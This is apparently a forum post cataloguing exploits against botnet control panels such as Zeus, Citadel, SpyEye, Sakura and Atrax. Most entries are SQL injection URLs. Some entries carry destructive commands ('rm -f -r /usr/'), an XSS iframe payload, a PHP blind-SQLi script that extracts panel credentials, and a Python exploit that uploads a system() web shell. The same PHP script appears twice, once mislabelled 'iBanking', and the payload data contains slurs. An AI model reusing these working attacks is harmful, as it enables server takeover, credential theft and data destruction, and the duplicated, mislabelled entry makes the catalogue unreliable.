Post: #1
Botnet Exploits
Athena
Casinoloader
Citadel
CYTHOSIA BOTNET
DLOADER
HERPES
SAKURA
SILENCE WINLOCKER V5.0
SMOKE LOADER
SOLARBOT
SPY-EYE
TINBA
UMBRA
ZEUS AND ZEUS EVO
ZSKIMMER
iBanking
Atrax botnet
Phase botnet
Botnet Exploits
Athena
Quote: Yazdı:Type: SQLi
Vuln: http://localhost:8992/panel/gate.php?botid=1&newbot=1&country=AUD&country_code=AUD &ip=10.0.0.1&os=win&cpu=amd&type=mate&cores=1999&version=88.8&net=wlan&admin=narwals&busy=no&lastseen=now
Casinoloader
Quote: Yazdı:Type: SQLi
Vuln: http://localhost/gateway.php
POSTDATA page=1&val=1
Citadel
Quote: Yazdı:Type: SQLi
Vuln: http://localhost/cp.php?bots=1
CYTHOSIA BOTNET
Quote: Yazdı:Type: Stored XSS and iFrame redirect
Click add task Command: IFRAME SRC="whateverekorlemonpartyorwhatnot.com" /IFRAME
Then Click Create Task Finally click Tasks. VOILA!
(Credits to asterea for finding this botnet panel)
DLOADER
Quote: Yazdı:Type: SQLi
Vuln1: http://localhost/includes/get_kktocc.php?line=1
Vuln2: http://localhost/includes/update_url.php?fid=1
HERPES
Quote: Yazdı:SQL injection.
http://localhost/tasks.php POST: vote=1&submitted=1
SAKURA
Quote: Yazdı:Type: SQLi
http://localhost/func.php?showtopic=2 http://localhost/index.php?showtopic=322 http://localhost/sakuraadmin44.php?filename=1.png&cmd=rm%20-f%20-r%20%2Fusr%2F&edit=2312 http://localhost/sakuraadmin44.php?filename=1.png&cmd=apt-get%20install%20backdoor http://localhost/sakuraadmin44.php?link=http%3A%2F%2Fmetasploit.com%2F&threads=10 http://localhost/showthread.php?t=123 http://localhost/showthread.php?t=23&cmd=32
Type: SQLi - POST
http://localhost/sakuraadmin44.php?threads=222&link=21213.com POST: exploits=992.ds http://localhost/sakuraadmin44.php?threads=11 POST: snick=123&file=321&exploits=123 http://localhost/sakuraadmin44.php?threads=21 POST: snick=1
SILENCE WINLOCKER V5.0
Quote: Yazdı:SQL injection.
http://localhost/forma.php?pin=4322 http://localhost/index.php?x=1&act=delete&id=1 http://localhost/picture.php?pin=8787 http://localhost/tmp/get.php?pin=1334
SMOKE LOADER
Quote: Yazdı:Type: SQLi
http://localhost/control.php?id=1 http://localhost/guest.php?id=1
POST
SOLARBOT
Quote: Yazdı:SQL injection.
localhost/index.php POSTDATA i=1881&p=80&u=8302&h=282&s=AUD
SPY-EYE
Quote: Yazdı:Type: SQLi
http://localhost/frm_boa-grabber_sub.php?dt=11%2F11%2F1998
TINBA
Quote: Yazdı:Type: SQLi
\tinybanker panel\admin/control/logs.act.php http://localhost/logs.act.php Post Data: bot_uid=1&botcomment=mate
UMBRA
Quote: Yazdı:Type: SQLi
Vuln: http://localhost/delete_command.php?deleteID=1
ZEUS AND ZEUS EVO
Quote: Yazdı:Type: SQLi
Vuln: http://localhost/gate.php?ip=8.8.8.8
ZSKIMMER
Quote: Yazdı:Type: SQLi
Vuln: http://localhost/process.php?xy=2
iBanking
Quote: Yazdı:Type: Shell upload
shell: <?php
// Panel.zip hash: c49c74a609b24284a0a66fc008c4d8f2
// Start with PHP CLI (php pwn.php)
set_time_limit(0);
// Adjust this
define('SLEEP_TIME', '4');
define('PAGE_TIME', 4);
define('URL', 'http://localhost/Phase/');
echo('attacking ' . URL . PHP_EOL);
get_string('username');
get_string('password');
function get_length($field) {
$length = 1;
while (!is_true("' UNION SELECT ALL 1,2,3,4,5,6,7 FROM `settings` WHERE `key` = '" . $field . "' AND (NOT (LENGTH(value)=" . $length . ") OR SLEEP(" . SLEEP_TIME . "))-- ")) {
++$length;
}
echo($field . ' length: ' . $length . PHP_EOL);
return $length;
}
function get_string($field) {
$length = get_length($field);
$str = '';
for ($i = 0; $i < $length; ++$i) {
$str .= chr(get_char($field, $i));
echo($field . ' : ' . str_pad($str, $length, '*') . PHP_EOL);
}
return $str;
}
function get_char($field, $id) {
$binary = '';
for ($i = 1; $i < 256; $i *= 2) {
if ($i == 128)
$binary = '0' . $binary;
else
$binary = (is_true("' UNION SELECT ALL 1,2,3,4,5,6,7 FROM `settings` WHERE `key` = '" . $field . "' AND (NOT (ORD(SUBSTR(`value`," . ($id + 1) . ",1)) & " . $i . ") OR SLEEP(" . SLEEP_TIME . "))-- ") ? '1' : '0') . $binary;
}
return bindec($binary);
}
function is_true($query) {
$rc4_key = 'aaaa'; // b d u
$data = 'u=tapz&d=faggot&b=lol';
$encode = rc4($rc4_key, $data, strlen($data), strlen($rc4_key));
$encode = $rc4_key . $encode;
$injection = urlencode($query);
$req = post_request(URL . 'gate.php?i=127.0.0.1' . $injection, $encode);
return !($req['time'] < PAGE_TIME);
}
function post_request($url, $data) {
$handle = curl_init($url);
curl_setopt($handle, CURLOPT_HEADER, false);
curl_setopt($handle, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36');
curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);
curl_setopt($handle, CURLOPT_POST, true);
curl_setopt($handle, CURLOPT_POSTFIELDS, $data);
curl_setopt($handle, CURLOPT_TIMEOUT, 30);
$time = microtime(true);
$page = curl_exec($handle);
$time = microtime(true) - $time;
curl_close($handle);
return array(
'page' => $page,
'time' => $time
);
}
function rc4($pwd, $data, $data_length, $pwd_length){
$key[] = '';
$box[] = '';
$cipher = '';
for ($i = 0; $i < 256; $i++)
{
$key[$i] = ord($pwd[$i % $pwd_length]);
$box[$i] = $i;
}
for ($j = $i = 0; $i < 256; $i++)
{
$j = ($j + $box[$i] + $key[$i]) % 256;
$tmp = $box[$i];
$box[$i] = $box[$j];
$box[$j] = $tmp;
}
for ($a = $j = $i = 0; $i < $data_length; $i++)
{
$a = ($a + 1) % 256;
$j = ($j + $box[$a]) % 256;
$tmp = $box[$a];
$box[$a] = $box[$j];
$box[$j] = $tmp;
$k = $box[(($box[$a] + $box[$j]) % 256)];
$cipher .= chr(ord($data[$i]) ^ $k);
}
return $cipher;
}
Atrax botnet
Quote: Yazdı:Type: Shell Upload
Shell: #!/usr/bin/python
import random
import string
import base64
import urllib
import urllib2
# <CONFIG>
payload = '<pre><?php if(isset($_GET["c"]))system($_GET["c"]);else echo("No input?");?></pre>'
url = 'http://localhost/atrax/'
# </CONFIG>
BOT_MODE_INSERT = 'b' # BOT MODE
BOT_MODE_RUNPLUGIN = 'e'
GET_PARAM_MODE = 'a' # GET PARAM
POST_PARAM_GUID = 'h' # POST PARAM
POST_PARAM_IP = 'i'
POST_PARAM_BUILDID = 'j'
POST_PARAM_PC = 'k'
POST_PARAM_OS = 'l'
POST_PARAM_ADMIN = 'm'
POST_PARAM_CPU = 'n'
POST_PARAM_GPU = 'o'
POST_PARAM_PLUGINNAME = 'q'
def request(url, get, post):
if not get == '':
url += '?' + get
encoded = {}
if not post == '':
for _ in post.split('&'):
data = _.split('=')
encoded[data[0]] = data[1]
encoded = urllib.urlencode(encoded)
request = urllib2.Request(url, encoded)
response = urllib2.urlopen(request)
page = response.read()
return page
def queryValue(key, value, next=True):
ret = key + '=' + value
if next:
ret += '&'
return ret
def randomString(length = 8):
return ''.join(random.choice(string.ascii_lowercase + string.digits) for i in range(length))
def createVictim(url, guid, ip):
get = queryValue(GET_PARAM_MODE, BOT_MODE_INSERT, False)
post = queryValue(POST_PARAM_GUID, guid)
post += queryValue(POST_PARAM_IP, ip)
post += queryValue(POST_PARAM_BUILDID, randomString())
post += queryValue(POST_PARAM_PC, randomString())
post += queryValue(POST_PARAM_OS, randomString())
post += queryValue(POST_PARAM_ADMIN, 'yes')
post += queryValue(POST_PARAM_CPU, randomString())
post += queryValue(POST_PARAM_GPU, randomString(), False)
return request(url + 'auth.php', get, post)
def exploit(url, guid, ip, file, payload):
get = queryValue(GET_PARAM_MODE, BOT_MODE_RUNPLUGIN, False)
post = queryValue(POST_PARAM_PLUGINNAME, 'atraxstealer')
post += queryValue(POST_PARAM_GUID, guid)
post += queryValue(POST_PARAM_IP, ip)
post += queryValue('am', randomString())
post += queryValue('ad', file)
post += queryValue('ab', base64.b64encode(payload))
post += queryValue('ai', '18', False)
request(url + 'auth.php', get, post)
def testExploit(url, guid, ip):
file = randomString() + '.php'
payload = '<?php echo("1337"); ?>'
exploit(url, guid, ip, file, payload)
return request(url + 'plugins/atraxstealer/wallet/' + file, '', '').strip() == '1337'
guid = '7461707a7461707a7461707a7461707a'
ip = '91.224.13.103'
file = randomString() + '.php'
if createVictim(url, guid, ip).strip() == 'STOP':
print '[-] Cannot create victim...'
else:
print '[~] Victim created/updated...'
if testExploit(url, guid, ip):
exploit(url, guid, ip, file, payload)
print '[+] Exploit uploaded!'
print '=> ' + url + 'plugins/atraxstealer/wallet/' + file
else:
print '[-] Cannot upload payload, maybe the plugin is not actived?'
Phase botnet
Quote: Yazdı:Type: blind SQLi
Vuln: <?php
// Panel.zip hash: c49c74a609b24284a0a66fc008c4d8f2
// Start with PHP CLI (php pwn.php)
set_time_limit(0);
// Adjust this
define('SLEEP_TIME', '4');
define('PAGE_TIME', 4);
define('URL', 'http://localhost/Phase/');
echo('attacking ' . URL . PHP_EOL);
get_string('username');
get_string('password');
function get_length($field) {
$length = 1;
while (!is_true("' UNION SELECT ALL 1,2,3,4,5,6,7 FROM `settings` WHERE `key` = '" . $field . "' AND (NOT (LENGTH(value)=" . $length . ") OR SLEEP(" . SLEEP_TIME . "))-- ")) {
++$length;
}
echo($field . ' length: ' . $length . PHP_EOL);
return $length;
}
function get_string($field) {
$length = get_length($field);
$str = '';
for ($i = 0; $i < $length; ++$i) {
$str .= chr(get_char($field, $i));
echo($field . ' : ' . str_pad($str, $length, '*') . PHP_EOL);
}
return $str;
}
function get_char($field, $id) {
$binary = '';
for ($i = 1; $i < 256; $i *= 2) {
if ($i == 128)
$binary = '0' . $binary;
else
$binary = (is_true("' UNION SELECT ALL 1,2,3,4,5,6,7 FROM `settings` WHERE `key` = '" . $field . "' AND (NOT (ORD(SUBSTR(`value`," . ($id + 1) . ",1)) & " . $i . ") OR SLEEP(" . SLEEP_TIME . "))-- ") ? '1' : '0') . $binary;
}
return bindec($binary);
}
function is_true($query) {
$rc4_key = 'aaaa'; // b d u
$data = 'u=tapz&d=faggot&b=lol';
$encode = rc4($rc4_key, $data, strlen($data), strlen($rc4_key));
$encode = $rc4_key . $encode;
$injection = urlencode($query);
$req = post_request(URL . 'gate.php?i=127.0.0.1' . $injection, $encode);
return !($req['time'] < PAGE_TIME);
}
function post_request($url, $data) {
$handle = curl_init($url);
curl_setopt($handle, CURLOPT_HEADER, false);
curl_setopt($handle, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36');
curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);
curl_setopt($handle, CURLOPT_POST, true);
curl_setopt($handle, CURLOPT_POSTFIELDS, $data);
curl_setopt($handle, CURLOPT_TIMEOUT, 30);
$time = microtime(true);
$page = curl_exec($handle);
$time = microtime(true) - $time;
curl_close($handle);
return array(
'page' => $page,
'time' => $time
);
}
function rc4($pwd, $data, $data_length, $pwd_length){
$key[] = '';
$box[] = '';
$cipher = '';
for ($i = 0; $i < 256; $i++)
{
$key[$i] = ord($pwd[$i % $pwd_length]);
$box[$i] = $i;
}
for ($j = $i = 0; $i < 256; $i++)
{
$j = ($j + $box[$i] + $key[$i]) % 256;
$tmp = $box[$i];
$box[$i] = $box[$j];
$box[$j] = $tmp;
}
for ($a = $j = $i = 0; $i < $data_length; $i++)
{
$a = ($a + 1) % 256;
$j = ($j + $box[$a]) % 256;
$tmp = $box[$a];
$box[$a] = $box[$j];
$box[$j] = $tmp;
$k = $box[(($box[$a] + $box[$j]) % 256)];
$cipher .= chr(ord($data[$i]) ^ $k);
}
return $cipher;
}
